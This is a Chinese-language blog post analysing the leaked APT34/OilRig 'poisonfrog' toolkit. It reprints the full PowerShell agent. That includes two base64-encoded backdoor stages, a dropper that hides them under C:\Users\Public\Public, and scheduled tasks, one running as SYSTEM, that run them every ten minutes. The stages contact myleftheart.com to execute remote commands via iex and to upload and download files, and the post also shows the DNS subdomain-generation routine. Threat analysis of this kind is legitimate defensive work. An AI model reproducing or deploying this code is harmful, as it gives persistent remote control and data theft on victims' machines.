2019-04-20 19:57:14 Author: mp.weixin.qq.com(查看原文) 阅读量:6 收藏

几周前,一群名为Lab Dookhtegan的伊朗黑客开始泄露有关APT34 / OILRIG的信息,据说这是属于伊朗情报部。漏洞从3月26日开始,当时Dookhtegan开始删除包含Telegram源码的备份存档。到目前为止,只有很低的覆盖率,并且泄漏第一次出现的Telegram群组只有大约30名成员。目前还不知道泄密者是谁。
本文是关于此次泄漏事件的快速概述,将包含一些IOC。我的Github页面上提供了本文中提供的代码片段。

请仔细阅读本文中的信息。我正在分析泄露材料的内容,而不是原因。这也可能是一场虚假的宣传活动,而不是APT34。

第一个泄漏的工具被称为posionfrog,包含两部分:

  • 服务器端模块,node.js写的c2

    • 代理程序部分,powershell版的payload。

  1. ${global:$address1} = $env:PUBLIC + "\Public";
  2. ${global:$dns_ag} = "JENDQSA9ICJteWxlZnRoZWFydC5jb20iOw0KJEREQSA9IGdldC13bWlvYmplY3QgV2luMzJfQ29tcHV0ZXJTeXN0ZW1Qcm9kdWN0ICB8IFNlbGVjdC1PYmplY3QgLUV4cGFuZFByb3BlcnR5IFVVSUQgfCAleyAiYXRhZzEyIiArICRfLnJlcGxhY2UoJy0nLCcnKSB9fCAleyRfICsgIjEyMzQ1Njc4OTAifSB8ICV7JF8uc3Vic3RyaW5nKDAsMTApfQ0KDQpmdW5jdGlvbiBFRUEgKCRGRkEsICRHR0EsICRISEEsICRJSUEsICRKSkEpDQp7DQoJJEtLQSA9IC1qb2luICgoNDggLi4gNTcpKyg2NSAuLiA3MCkgfCBHZXQtUmFuZG9tICAtQ291bnQgKCV7IEdldC1SYW5kb20gLUlucHV0T2JqZWN0ICgxIC4uIDcpIH0pIHwgJXsgW2NoYXJdJF8gfSk7DQoJJExMQSA9IEdldC1SYW5kb20gLUlucHV0T2JqZWN0ICgwIC4uIDkpIC1Db3VudCAyOw0KCSRNTUEgPSAkRERBLkluc2VydCgoJExMQVsxXSksICRHR0EpLkluc2VydCgkTExBWzBdLCAkRkZBKTsNCgl3cml0ZS1ob3N0ICREREE7DQoJaWYgKCRKSkEgLWVxICJzIikNCgl7IHJldHVybiAiJCgkTU1BKSQoJEtLQSlBJCgkTExBWzBdKSQoJExMQVsxXSk3LiRISEEuJElJQS4kQ0NBIjsgfQ0KCWVsc2UgDQoJeyByZXR1cm4gIiQoJE1NQSkkKCRLS0EpQSQoJExMQVswXSkkKCRMTEFbMV0pNy4kKCRDQ0EpIjt9DQp9DQpmdW5jdGlvbiByZWNlaXZlDQp7DQoJJE5OQSA9ICRmYWxzZTsNCgkkT09BID0gMDsNCgkkUFBBID0gJHtnbG9iYWw6JFFRQX0gKyAiXCI7DQoJJFJSQSA9IEAoKTsNCgkkU1NBID0gIjAwMCI7DQoJJFRUQSA9ICIwIjsNCgkke2dsb2JhbDokVVVBfSA9ICR0cnVlOw0KCQ0KCSR7Z2xvYmFsOiRleGNlcHRpb25fY291bnRlcnNzc30gPSAwOw0KCSR7Z2xvYmFsOiRleGNlcHRpb25fY291bnRfbGltaXRzc3N9ID0gMjsNCgkNCglXaGlsZSAoJHtnbG9iYWw6JFVVQX0pDQoJew0KCQlpZiAoJHtnbG9iYWw6JGV4Y2VwdGlvbl9jb3VudGVyc3NzfSAtZ3QgJHtnbG9iYWw6JGV4Y2VwdGlvbl9jb3VudF9saW1pdHNzc30pIHsgYnJlYWsgfQ0KCQlTdGFydC1TbGVlcCAtbSAxMDA7DQoJCWlmICgkT09BIC1sdCAxMCkgeyAkU1NBID0gIjAwJCgkT09BKSI7IH0NCgkJZWxzZWlmICgkT09BIC1sdCAxMDApIHsgJFNTQSA9ICIwJCgkT09BKSI7IH0NCgkJZWxzZSB7ICRTU0EgPSAiJCgkT09BKSI7IH0NCgkJJFZWQSA9IEVFQSAkU1NBICRUVEEgIiIgIiIgInIiDQoJCXRyeQ0KCQl7DQoJCQlXcml0ZS1Ib3N0ICRWVkE7DQoJCQkkV1dBID0gW1N5c3RlbS5OZXQuRG5zXTo6R2V0SG9zdEFkZHJlc3NlcygkVlZBKTsNCgkJCVdyaXRlLUhvc3QgJFdXQTsNCgkJfQ0KCQljYXRjaCBbRXhjZXB0aW9uXQ0KCQl7DQoJCQllY2hvICRfLkV4Y2VwdGlvbi5HZXRUeXBlKCkuRnVsbE5hbWUsICRfLkV4Y2VwdGlvbi5NZXNzYWdlOyBXcml0ZS1Ib3N0ICJleGNlcHRvbiBvY2N1cmVkISI7ICR7Z2xvYmFsOiRleGNlcHRpb25fY291bnRlcnNzc30gPSAke2dsb2JhbDokZXhjZXB0aW9uX2NvdW50ZXJzc3N9ICsgMTsgY29udGludWU7DQoJCX0NCgkJDQoJCWlmICgkV1dBIC1lcSAkbnVsbCkNCgkJew0KCQkJJHtnbG9iYWw6JGV4Y2VwdGlvbl9jb3VudGVyc3NzfSA9ICR7Z2xvYmFsOiRleGNlcHRpb25fY291bnRlcnNzc30gKyAxOw0KCQkJY29udGludWU7DQoJCX0NCgkJJFhYQSA9ICRXV0FbMF0uSVBBZGRyZXNzVG9TdHJpbmcuU3BsaXQoJy4nKTsNCgkJV3JpdGUtSG9zdCAiJCgkT09BKTokKCRYWEFbM10pYHRzYXZlaW5nX21vZGU6ICQoJE5OQSlgdCAgICQoJFhYQVswXSkgJCgkWFhBWzFdKSAkKCRYWEFbMl0pIg0KCQkNCgkJaWYgKCgkWFhBWzBdIC1lcSAxKSAtYW5kICgkWFhBWzFdIC1lcSAyKSAtYW5kICgkWFhBWzJdIC1lcSAzKSkNCgkJew0KCQkJJE5OQSA9ICRmYWxzZTsNCgkJCSRUVEEgPSAiMCI7DQoJCQkkbGVuID0gJFJSQS5MZW5ndGgNCgkJCWlmICgkUlJBWyRsZW4tMV0gLWVxIDAgLWFuZCAkUlJBWyRsZW4tMl0gLWVxIDApDQoJCQl7DQoJCQkJJFlZQSA9ICRSUkFbMCAuLiAoJGxlbiAtIDMpXTsNCgkJCX0NCgkJCWVsc2VpZiAoJFJSQVskbGVuIC0gMV0gLWVxIDApDQoJCQl7DQoJCQkJJFlZQSA9ICRSUkFbMCAuLiAoJGxlbiAtIDIpXTsNCgkJCX0NCgkJCWVsc2UNCgkJCXsNCgkJCQkkWVlBID0gJFJSQTsNCgkJCX0NCgkJCVtTeXN0ZW0uSU8uRmlsZV06OldyaXRlQWxsQnl0ZXMoJFBQQSwgJFlZQSk7DQoJCQkkUlJBID0gQCgpOw0KCQkJJFlZQSA9IEAoKTsNCgkJCSRPT0EgPSAwOw0KCQkJJHtnbG9iYWw6JFVVQX0gPSAkZmFsc2U7DQoJCX0NCgkJDQoJCWlmICgkTk5BKQ0KCQl7DQoJCQlpZiAoJE9PQSAtZ3QgMjUwKSB7ICRPT0EgPSAwOyB9DQoJCQlpZiAoJE9PQSAtZXEgJFhYQVszXSkNCgkJCXsNCgkJCQkkUlJBICs9ICRYWEFbMF07DQoJCQkJJFJSQSArPSAkWFhBWzFdOw0KCQkJCSRSUkEgKz0gJFhYQVsyXTsNCgkJCQkkT09BID0gJE9PQSArIDM7DQoJCQl9DQoJCX0NCgkJDQoJCWlmICgoJFhYQVswXSAtZXEgMjQpIC1hbmQgKCRYWEFbMV0gLWVxIDEyNSkpDQoJCXsNCgkJCSRQUEEgKz0gJFhYQVsyXSArICIiICsgJFhYQVszXTsNCgkJCSROTkEgPSAkdHJ1ZTsNCgkJCSRUVEEgPSAiMSI7DQoJCQkkT09BID0gMDsNCgkJfQ0KCQkNCgkJaWYgKCgkWFhBWzBdIC1lcSAxMSkgLWFuZCAoJFhYQVsxXSAtZXEgMjQpIC1hbmQgKCRYWEFbMl0gLWVxIDIzNykgLWFuZCAoJFhYQVszXSAtZXEgMTEwKSkgIyBraWxsIHRoaXMgcHJvY2Vzcw0KCQl7DQoJCQkke2dsb2JhbDokVVVBfSA9ICRmYWxzZTsNCgkJCSR7Z2xvYmFsOiRleGNlcHRpb25fY291bnRlcnNzc30gPSAke2dsb2JhbDokZXhjZXB0aW9uX2NvdW50ZXJzc3N9ICsgMTsNCgkJfQ0KCX0NCglTdGFydC1TbGVlcCAtcyAxOw0KfQ0KDQoNCg0KDQpmdW5jdGlvbiBzZW5kDQp7DQoJJE9PQSA9IDA7DQoJJFpaQSA9IEAoR2V0LUNoaWxkSXRlbSAtUGF0aCAke2dsb2JhbDokQUFCfSB8IFdoZXJlLU9iamVjdCB7ICEkXy5QU0lzQ29udGFpbmVyIH0pOw0KCWlmICgkWlpBIC1uZSAkbnVsbCkNCgl7DQoJCSRCQkIgPSAke2dsb2JhbDokQUFCfSArICJcIiArICRaWkFbMF07DQoJCSRDQ0IgPSBzbGFiZXIgJEJCQjsNCgkJaWYgKFtpbnRdJENDQi5MZW5ndGggLWxlIDApDQoJCXsNCgkJCVJlbW92ZS1JdGVtIC1QYXRoICRCQkI7DQoJCQlyZXR1cm47DQoJCX0NCgkJJEREQiA9IDYwOw0KCQkkRUVCID0gIioiICogNTQ7DQoJCSRFRUIgPSBTcGxpdC1QYXRoICRCQkIgLUxlYWYgfCAlIHsgJEVFQi5JbnNlcnQoMCwgJF8pIH0gfCAlIHsgJF8uSW5zZXJ0KDYsICRDQ0IuTGVuZ3RoKSB9IHwgJXskX1swLi4yNl0gLWpvaW4gIiJ9Ow0KCQkkRUVCID0gLWpvaW4gKCRFRUIgfCAlIHsgcmVzb2x2ZXIgJF8gfSkNCgkJJEZGQiA9ICJiV1YwWVQiICsgJEVFQjsNCgkJJENDQiA9ICRGRkIgKyAkQ0NCOw0KCQkkR0dCID0gIjAwMCI7DQoJCSRUVEEgPSAiMiI7DQoJCSRISEIgPSAwOw0KCQkke2dsb2JhbDokVVVBfSA9ICR0cnVlOw0KCQkNCgkJJHtnbG9iYWw6JGV4Y2VwdGlvbl9jb3VudGVyc3NzfSA9IDA7DQoJCSR7Z2xvYmFsOiRleGNlcHRpb25fY291bnRfbGltaXRzc3N9ID0gMjsNCgkJDQoJCVdoaWxlICgke2dsb2JhbDokVVVBfSkNCgkJew0KCQkJaWYgKCR7Z2xvYmFsOiRleGNlcHRpb25fY291bnRlcnNzc30gLWd0ICR7Z2xvYmFsOiRleGNlcHRpb25fY291bnRfbGltaXRzc3N9KSB7IGJyZWFrOyB9DQoJCQlTdGFydC1TbGVlcCAtbSAxMDA7DQoJCQlpZiAoJE9PQSAtZXEgMjUwKSB7ICRPT0EgPSAwOyAkSEhCICs9IDI1MDsgfQ0KCQkJaWYgKCRPT0EgLWx0IDEwKSB7ICRHR0IgPSAiMDAkKCRPT0EpIjsgfQ0KCQkJZWxzZWlmICgkT09BIC1sdCAxMDApIHsgJEdHQiA9ICIwJCgkT09BKSI7IH0NCgkJCWVsc2UgeyAkR0dCID0gIiQoJE9PQSkiOyB9DQoJCQkNCgkJCWlmICgkQ0NCLkxlbmd0aCAtZ3QgJEREQikNCgkJCXsNCgkJCQlpZiAoKCRDQ0IuTGVuZ3RoIC0gJEREQiAqICgkT09BICsgJEhIQikpIC1nZSAkRERCKQ0KCQkJCXsNCgkJCQkJJElJQiA9ICRDQ0IuU3Vic3RyaW5nKCREREIgKiAoJE9PQSArICRISEIpLCAkRERCKTsNCgkJCQl9DQoJCQkJZWxzZWlmICgoJENDQi5MZW5ndGggLSAkRERCICogKCRPT0EgKyAkSEhCKSkgLWd0IDApDQoJCQkJew0KCQkJCQkkSUlCID0gJENDQi5TdWJzdHJpbmcoJEREQiAqICgkT09BICsgJEhIQiksICgkQ0NCLkxlbmd0aCAtICREREIgKiAoJE9PQSArICRISEIpKSk7DQoJCQkJfQ0KCQkJCWVsc2UNCgkJCQl7DQoJCQkJCSRJSUIgPSAiYldWMFlUWlc1ayI7DQoJCQkJCSR7Z2xvYmFsOiRVVUF9ID0gJGZhbHNlOw0KCQkJCQlSZW1vdmUtSXRlbSAtcGF0aCAkQkJCIC1Gb3JjZTsNCgkJCQl9DQoJCQl9DQoJCQllbHNlDQoJCQl7DQoJCQkJJElJQiA9ICRDQ0I7DQoJCQl9DQoJCQkkSkpCID0gKFNwbGl0LVBhdGggJEJCQiAtTGVhZikgKyAiKiIgfCAlIHsgcmVzb2x2ZXIgJF8gfTsNCgkJCSRWVkEgPSBFRUEgJEdHQiAkVFRBICRJSUIgJEpKQiAicyINCgkJCVdyaXRlLUhvc3QgIiQoJElJQilgdCQoJFZWQSkiDQoJCQl0cnkNCgkJCXsNCgkJCQkkV1dBID0gW1N5c3RlbS5OZXQuRG5zXTo6R2V0SG9zdEFkZHJlc3NlcygkVlZBKTsNCgkJCX0NCgkJCWNhdGNoIHsgV3JpdGUtSG9zdCAiZXhjZXB0b24gb2NjdXJlZCEiOyAke2dsb2JhbDokZXhjZXB0aW9uX2NvdW50ZXJzc3N9ID0gJHtnbG9iYWw6JGV4Y2VwdGlvbl9jb3VudGVyc3NzfSArIDE7IGNvbnRpbnVlOyB9DQoJCQkNCgkJCWlmICgkV1dBIC1lcSAkbnVsbCkgeyAke2dsb2JhbDokZXhjZXB0aW9uX2NvdW50ZXJzc3N9ID0gJHtnbG9iYWw6JGV4Y2VwdGlvbl9jb3VudGVyc3NzfSArIDE7Y29udGludWUgfQ0KCQkJJFhYQSA9ICRXV0FbMF0uSVBBZGRyZXNzVG9TdHJpbmcuU3BsaXQoJy4nKTsNCgkJCVdyaXRlLUhvc3QgIiQoJE9PQSk6JCgkWFhBWzNdKWB0c2F2ZWluZ19tb2RlOiAkKCROTkEpYHQgICAkKCRYWEFbMF0pICQoJFhYQVsxXSkgJCgkWFhBWzJdKSINCgkJCQ0KCQkJaWYgKCgkWFhBWzBdIC1lcSAxKSAtYW5kICgkWFhBWzFdIC1lcSAyKSAtYW5kICgkWFhBWzJdIC1lcSAzKSkNCgkJCXsNCgkJCQkkT09BID0gW2ludF0kWFhBWzNdOw0KCQkJfQ0KCQkJDQoJCQlpZiAoKCRYWEFbMF0gLWVxIDExKSAtYW5kICgkWFhBWzFdIC1lcSAyNCkgLWFuZCAoJFhYQVsyXSAtZXEgMjM3KSAtYW5kICgkWFhBWzNdIC1lcSAxMTApKSAjIGtpbGwgdGhpcyBwcm9jZXNzDQoJCQl7DQoJCQkJJEhIQiA9IDANCgkJCQkke2dsb2JhbDokVVVBfSA9ICRmYWxzZTsNCgkJCQkke2dsb2JhbDokZXhjZXB0aW9uX2NvdW50ZXJzc3N9ID0gJHtnbG9iYWw6JGV4Y2VwdGlvbl9jb3VudGVyc3NzfSArIDM7DQoJCQkJZGVsICRCQkI7DQoJCQl9DQoJCX0NCgl9DQp9DQpmdW5jdGlvbiBzbGFiZXIgKCRLS0IpIHsNCglpZiAoKEdldC1JdGVtICRLS0IpLmxlbmd0aCAtZ3QgNjAwa2IpDQoJew0KCQkicmVzdWx0IHNpemUgZXhjZWVkZWQgdGhlIG1heGltdW0gc2l6ZSBhbmQgaXQgZGVsZXRlZCIgfCBTZXQtQ29udGVudCAkS0tCOw0KCX0NCgkkZiA9IEdldC1Db250ZW50ICRLS0IgLUVuY29kaW5nIEJ5dGU7DQoJJGUgPSByZXNvbHZlcigkZik7DQoJcmV0dXJuICRlOw0KfQ0KZnVuY3Rpb24gcmVzb2x2ZXIgKCRMTEIpIHsNCgkkY250ID0gMDsNCgkkcDEgPSAiIjsNCgkkcDIgPSAiIjsNCglmb3IgKCRpID0gMDsgJGkgLWx0ICRMTEIuTGVuZ3RoOyAkaSsrKQ0KCXsNCgkJaWYgKCRjbnQgLWVxIDMwKQ0KCQl7DQoJCQkkY250ID0gMDsNCgkJCSRyZXMgKz0gKCRwMSArICRwMik7DQoJCQkkcDEgPSAiIjsgJHAyID0gIiI7DQoJCX0NCgkJJHRtcCA9IFtTeXN0ZW0uQml0Q29udmVydGVyXTo6VG9TdHJpbmcoJExMQlskaV0pLlJlcGxhY2UoIi0iLCAiIik7DQoJCSRwMSArPSAkdG1wWzBdOw0KCQkkcDIgKz0gJHRtcFsxXTsNCgkJJGNudCsrOw0KCX0NCgkkcmVzICs9ICgkcDEgKyAkcDIpOw0KCXJldHVybiAkcmVzOw0KfQ0KZnVuY3Rpb24gcHJvY2Vzc29yDQp7DQoJJFpaQSA9IEAoR2V0LUNoaWxkSXRlbSAtUGF0aCAke2dsb2JhbDokUVFBfSB8IFdoZXJlLU9iamVjdCB7ICEkXy5QU0lzQ29udGFpbmVyIH0pOw0KCWlmICgkWlpBIC1uZSAkbnVsbCkNCgl7DQoJCSRCQkIgPSAke2dsb2JhbDokUVFBfSArICJcIiArICRaWkFbMF07DQoJCSRNTUIgPSAkQkJCIC1yZXBsYWNlICJyZWNlaXZlYm94IiwgInNlbmRib3giOw0KCQkNCgkJaWYgKCRCQkIuRW5kc1dpdGgoIjAiKSkNCgkJew0KCQkJJE5OQiA9IEdldC1Db250ZW50ICRCQkIgfCA/IHsgJF8udHJpbSgpIC1uZSAiIiB9Ow0KCQkJJE9PQiA9ICR7Z2xvYmFsOiRBQUJ9ICsgIlwiICsgJFpaQVswXTsNCgkJCSROTkIgPSAkTk5CIHwgPyB7ICRfLnRyaW0oKSAtbmUgIiIgfQ0KCQkJJFBQQiArPSAkTk5CKyJcbiI7DQoJCQkkUFBCICs9ICROTkIuU3BsaXQoIiYiKSB8IGZvcmVhY2gtb2JqZWN0IHsgVHJ5IHsgJF8gfCBpZXggfCBPdXQtU3RyaW5nIH0gQ2F0Y2ggeyAkXyB8IE91dC1TdHJpbmd9IH0NCgkJCSRQUEIgKyI8PiIgfCBTZXQtQ29udGVudCAkT09CIC1FbmNvZGluZyBVVEY4DQoJCQlpZiAoVGVzdC1QYXRoIC1QYXRoICRCQkIpDQoJCQl7DQoJCQkJUmVtb3ZlLUl0ZW0gLXBhdGggJEJCQjsNCgkJCX0NCgkJfQ0KCQllbHNlaWYgKCRCQkIuRW5kc1dpdGgoIjEiKSkNCgkJew0KCQkJJFFRQiA9IEdldC1Db250ZW50ICRCQkIgfCA/IHsgJF8udHJpbSgpIC1uZSAiIiB9IHwgJXsgJF8uUmVwbGFjZSgiYDAiLCAiIikuVHJpbSgpIH0NCgkJCWlmIChUZXN0LVBhdGggLVBhdGggJFFRQikNCgkJCXsNCgkJCQkkT09CID0gJHtnbG9iYWw6JEFBQn0gKyAiXCIgKyAkWlpBWzBdOw0KCQkJCUNvcHktSXRlbSAtcGF0aCAkUVFCIC1kZXN0aW5hdGlvbiAkT09CIC1Gb3JjZTsNCgkJCX0NCgkJCWVsc2UNCgkJCXsNCgkJCQkiRmlsZSBub3QgZXhpc3QiIHwgU2V0LUNvbnRlbnQgJE1NQjsNCgkJCX0NCgkJCWlmIChUZXN0LVBhdGggLVBhdGggJEJCQikNCgkJCXsNCgkJCQlSZW1vdmUtSXRlbSAtcGF0aCAkQkJCOw0KCQkJfQ0KCQl9DQoJCWVsc2VpZiAoJEJCQi5FbmRzV2l0aCgiMiIpKQ0KCQl7DQoJCQkkUlJCID0gJEJCQiAtcmVwbGFjZSAicmVjZWl2ZWJveCIsICJkb25lIjsNCgkJCU1vdmUtSXRlbSAtcGF0aCAkQkJCIC1kZXN0aW5hdGlvbiAkUlJCIC1Gb3JjZTsNCgkJCWlmIChUZXN0LVBhdGggLVBhdGggJFJSQikNCgkJCXsNCgkJCQkoIjIwMDw+IiArICRSUkIpIHwgU2V0LUNvbnRlbnQgJE1NQjsNCgkJCQlSZW1vdmUtSXRlbSAtcGF0aCAkQkJCOw0KCQkJfQ0KCQl9DQoJfQ0KfQ0KDQoke2dsb2JhbDokU1NCfSA9ICRlbnY6UFVCTElDICsgIlxQdWJsaWNcIisgJEREQTsNCiR7Z2xvYmFsOiRRUUF9ID0gJHtnbG9iYWw6JFNTQn0gKyAiXHJlY2VpdmVib3giOw0KJHtnbG9iYWw6JEFBQn0gPSAke2dsb2JhbDokU1NCfSArICJcc2VuZGJveCI7DQoke2dsb2JhbDokVFRCfSA9ICR7Z2xvYmFsOiRTU0J9ICsgIlxkb25lIjsNCmlmICgtbm90IChUZXN0LVBhdGggLVBhdGggJHtnbG9iYWw6JFNTQn0pIC1vciAtbm90IChUZXN0LVBhdGggLVBhdGggJHtnbG9iYWw6JEFBQn0pKQ0Kew0KCW1kICR7Z2xvYmFsOiRTU0J9Ow0KCW1kICR7Z2xvYmFsOiRBQUJ9Ow0KCW1kICR7Z2xvYmFsOiRRUUF9Ow0KCW1kICR7Z2xvYmFsOiRUVEJ9Ow0KfQ0KcmVjZWl2ZTsNCnByb2Nlc3NvcjsNCnNlbmQ7";
  3. ${global:$http_ag} = "JEJCQSA9ICJodHRwOi8vIiArIFtTeXN0ZW0uTmV0LkRuc106OkdldEhvc3RBZGRyZXNzZXMoIm15bGVmdGhlYXJ0LmNvbSIpDQoke2dsb2JhbDokQ0NBfSA9IG5ldy1vYmplY3Qgc3lzdGVtLm5ldC5XZWJDbGllbnQNCiR0ID0gZ2V0LXdtaW9iamVjdCBXaW4zMl9Db21wdXRlclN5c3RlbVByb2R1Y3QgIHwgU2VsZWN0LU9iamVjdCAtRXhwYW5kUHJvcGVydHkgVVVJRA0KJEREQSA9ICR0IHwgJXsiYXRhZzEyIiArICRfLlJlcGxhY2UoJy0nLCAnJykgKyAiMTIzNDU2Nzg5MCJ9IHwgJXskXy5zdWJzdHJpbmcoMCwxMCl9DQokRUVBID0gJGVudjpQVUJMSUMrIlxQdWJsaWNcZmlsZXNcIjsNCmlmKC1ub3QoVGVzdC1QYXRoICRFRUEpKSB7bWQgJEVFQX0NCiRGRkEgPSAkRUVBKyJjZmcuaW5pIjsNCmlmKFRlc3QtUGF0aCAkRkZBKSB7DQoJJGxzID0gR2V0LUNvbnRlbnQgICRGRkEgfCBXaGVyZSB7ICRfIC1ub3RtYXRjaCAnXlxzKyQnIH0NCglmb3JlYWNoICgkbCBpbiAkbHMpDQoJew0KCQkkR0dBID0gJGwgLXNwbGl0ICcsJw0KCQlpZigkR0dBWzBdIC1lcSAic3J2Iil7JEhIQSA9ICRHR0FbMV0gKyAiIjt9DQoJCWlmKCRHR0FbMF0gLWVxICJ1c3IiKXskSUlBID0gJEdHQVsxXSArICIiO30NCgkJaWYoJEdHQVswXSAtZXEgInBhcyIpeyRKSkEgPSAkR0dBWzFdICsgIiI7fQ0KCQlpZigkR0dBWzBdIC1lcSAicHJ0Iil7JEtLQSA9ICRHR0FbMV0gKyAiIjt9DQoJCWlmKCRHR0FbMF0gLWVxICJkb20iKXskTExBID0gJEdHQVsxXSArICIiO30NCgl9DQoJJHUgPSAiaHR0cDovLyIgKyAkSEhBICsgIjoiICsgJEtLQTsNCgkkTU1BID0gbmV3LW9iamVjdCBTeXN0ZW0uTmV0LldlYlByb3h5KCR1LCAkdHJ1ZSk7DQoJJE5OQSA9IG5ldy1vYmplY3QgU3lzdGVtLk5ldC5OZXR3b3JrQ3JlZGVudGlhbCgkSUlBLCAkSkpBLCAkTExBKQ0KCSRNTUEuY3JlZGVudGlhbHMgPSAkTk5BDQoJJHtnbG9iYWw6JENDQX0ucHJveHkgPSAkTU1BOw0KfSBlbHNlIHske2dsb2JhbDokQ0NBfS5wcm94eSA9IFtTeXN0ZW0uTmV0LldlYlByb3h5XTo6R2V0RGVmYXVsdFByb3h5KCl9DQokciA9ICR0cnVlOw0Kd2hpbGUoJHIpIHsNCgkkciA9ICRmYWxzZTsNCgkkT09BID0gLWpvaW4gKEdldC1SYW5kb20gLUlucHV0T2JqZWN0ICgwIC4uIDkpIC1Db3VudCAoJXtHZXQtUmFuZG9tIC1JbnB1dE9iamVjdCAoMS4uOSl9KSkNCgkkUFBBID0gJEREQS5JbnNlcnQoNSwgJE9PQSkNCgkkUVFBID0gJHtnbG9iYWw6JENDQX0uRG93bmxvYWRTdHJpbmcoIiQoJEJCQSkvY28vJCgkUFBBKSIpDQoJd3JpdGUtaG9zdCAkUVFBDQoJJFJSQSA9ICIiDQoJaWYgKCRRUUEpIHsNCgkJJFNTQSA9ICRRUUEuc3BsaXQoIjw+IikgfCB3aGVyZSB7JF99DQoJCSRUVEEgPSAkU1NBWzBdOw0KCQkkcCA9ICRFRUErIiRUVEEiDQoJCWlmKCRTU0EubGVuZ3RoIC1ndCA0KSB7DQoJCQl3cml0ZS1ob3N0ICRTU0FbMV0NCgkJCWlmICgkU1NBWzJdIC1uZSAibm90IiAtYW5kICRTU0FbMl0pew0KCQkJCXdyaXRlLWhvc3QgJFNTQVsyXTsNCgkJCQkke2dsb2JhbDokQ0NBfS5Eb3dubG9hZEZpbGUoIiRCQkEvZmlsLyIrJFNTQVszXSwgJEVFQSskU1NBWzJdKTsNCgkJCQkiRmlsZSBzYXZlZCBpbiAiKyRFRUErJFNTQVsyXSB8IEFkZC1Db250ZW50ICRwDQoJCQl9DQoJCQlpZiAoJFNTQVsxXSAtbmUgIm5vdCIgLWFuZCAkU1NBWzFdKXsNCgkJCQkkUlJBICs9ICRTU0FbMV0rIjxici8+Ig0KCQkJCSRyY250ID0gJFNTQVsxXSB8ID8geyAkXy50cmltKCkgLW5lICIiIH0NCgkJCQkkUlJBICs9ICRyY250LlNwbGl0KCImIikgfCBmb3JlYWNoLW9iamVjdCB7IFRyeSB7ICRfIHwgaWV4IHwgT3V0LVN0cmluZyB9IENhdGNoIHsgJF8gfCBPdXQtU3RyaW5nfSB9DQoJCQkJJFJSQSsiPD4iIHwgU2V0LUNvbnRlbnQgJHANCgkJCQkjJHtnbG9iYWw6JENDQX0uVXBsb2FkU3RyaW5nKCIkQkJBL3Jlcy8kUFBBJFRUQSIsICRSUkEpOw0KCQkJfQ0KCQkJaWYgKCRTU0FbNF0gLW5lICJub3QiIC1hbmQgJFNTQVs0XSl7DQoJCQkJd3JpdGUtaG9zdCAkU1NBWzRdDQoJCQkJaWYoVGVzdC1QYXRoICRTU0FbNF0pIHsNCgkJCQkJJHtnbG9iYWw6JENDQX0uVXBsb2FkRmlsZSgiJEJCQS9maWwvJFBQQSRUVEEiLCAkU1NBWzRdKTsNCgkJCQkJInVwbDw+IiskU1NBWzRdIHwgQWRkLUNvbnRlbnQgJHANCgkJCQl9DQoJCQl9DQoJCQlpZigkU1NBWyRTU0EubGVuZ3RoIC0xXSAtZXEgIjEiKSB7DQoJCQkJJHIgPSAkdHJ1ZTsNCgkJCX0NCgkJCWlmKCRUVEEgLW5lICJub3QiIC1hbmQgJFRUQSkgew0KCQkJCSR7Z2xvYmFsOiRDQ0F9LlVwbG9hZEZpbGUoIiRCQkEvcmVzLyRQUEEkVFRBIiwgJHApOw0KCQkJCVJlbW92ZS1JdGVtICRwIC1Gb3JjZQ0KCQkJfQ0KCQl9DQoJfQ0KfQ==";
  5. if (-not (Test-Path -Path ${global:$address1}))
  6. {md ${global:$address1}; Get-Item ${global:$address1} -Force | %{$_.attributes = "Hidden"}}
  7. if (Test-Path -Path ${global:$address1})
  8. {
  9.     [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([string]${global:$http_ag})) | Set-Content "${global:$address1}\hUpdater.ps1";
  10.     [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([string]${global:$dns_ag})) | Set-Content "${global:$address1}\dUpdater.ps1";
  11.     "command0 = `"Powershell.exe -exec bypass -file ${global:$address1}\hUpdater.ps1`"`nset Shell0 = CreateObject(`"wscript.shell`")`nshell0.run command0, 0, false`ncommand1 = `"Powershell.exe -exec bypass -file ${global:$address1}\dUpdater.ps1`"`nset Shell1 = CreateObject(`"wscript.shell`")`nshell1.run command1, 0, false" | Out-File "${global:$address1}\UpdateTask.vbs"
  12.     schtasks /create /F /sc minute /mo 10 /tn "\UpdateTasks\UpdateTask" /tr "wscript /b \`"${global:$address1}\UpdateTask.vbs\`"";
  13.     schtasks /create /F /ru SYSTEM /sc minute /mo 10 /tn "\UpdateTasks\UpdateTaskHosts" /tr "wscript /b \`"${global:$address1}\UpdateTask.vbs\`"";
  14. }

代理程序部分包含2个base64,它们加载了powershell,我觉得,这似乎是第一阶段的payload。它从myleftheart.com(现在已经关闭)中去获取配置文件,在C:\Users\Public\Public中创建一堆文件夹,并在那里删除其他两个payload。它还创建了2个计划任务,一个具有管理员权限,一个具有普通用户权限,这些任务将运行两个PowerShell的脚本; dUpdater.ps1hUpdater.ps每10分钟一次。现在从这两个payload中可以清楚地看到它可以接收和发送文件。似乎这B还使用了代理:

  1. schtasks /create /F /sc minute /mo 10 /tn "\UpdateTasks\UpdateTask" /tr "wscript /b \`"${global:$address1}\UpdateTask.vbs\`"";
  2.     schtasks /create /F /ru SYSTEM /sc minute /mo 10 /tn "\UpdateTasks\UpdateTaskHosts" /tr "wscript /b \`"${global:$address1}\UpdateTask.vbs\`"";

  1. $u = "http://" + $HHA + ":" + $KKA;
  2.  $MMA = new-object System.Net.WebProxy($u, $true);
  3.  $NNA = new-object System.Net.NetworkCredential($IIA, $JJA, $LLA)
  4.  $MMA.credentials = $NNA

这个函数返回myleftheart.com域的子域:

  1. CCA = "myleftheart.com";
  2. $DDA = get-wmiobject Win32_ComputerSystemProduct  | Select-Object -ExpandProperty UUID | %{ "atag12" + $_.replace('-','') }| %{$_ + "1234567890"} | %{$_.substring(0,10)}
  4. function EEA ($FFA, $GGA, $HHA, $IIA, $JJA)
  5. {
  6.  $KKA = -join ((48 .. 57)+(65 .. 70) | Get-Random  -Count (%{ Get-Random -InputObject (1 .. 7) }) | %{ [char]$_ });
  7.  $LLA = Get-Random -InputObject (0 .. 9) -Count 2;
  8.  $MMA = $DDA.Insert(($LLA[1]), $GGA).Insert($LLA[0], $FFA);
  9.  write-host $DDA;
  10.  if ($JJA -eq "s")
  12.  { Print "$($MMA)$($KKA)A$($LLA[0])$($LLA[1])7.$HHA.$IIA.$CCA";}
  13.  else 
  14.  { Print "$($MMA)$($KKA)A$($LLA[0])$($LLA[1])7.$($CCA)";}

